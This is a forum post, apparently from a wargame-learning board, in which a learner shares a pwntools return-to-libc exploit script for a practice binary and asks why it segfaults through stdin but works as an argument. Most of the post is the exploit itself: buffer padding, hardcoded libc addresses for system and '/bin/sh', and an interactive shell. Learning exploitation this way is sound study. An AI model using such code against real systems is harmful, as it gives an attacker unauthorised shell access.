http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1963
I am trying to write exploit code for the RTL technique using pwntools.
=== exp.py ===
from pwn import *
import os
p = process('./rtl_me')
system = 0xf7e1dd10
exit = 0xf7e10f70
ppr = 0x80484ea
shell_addr = 0xf7f5c8cf # '/bin/sh' address
payload = 'A' * 260 # buf(256) + sfp(4)
payload += p32(system)
payload += p32(exit)
payload += p32(shell_addr)
p.send(payload)
sleep(0.5)
p.interactive()
==============
The problem is that using exp.py results in a segmentation fault, but when I use a script to pass it in as an argument, it works fine. I don't know what is wrong with that code.
Experts, please help ㅠㅠ
Hit : 2161 Date : 2019/06/07 09:45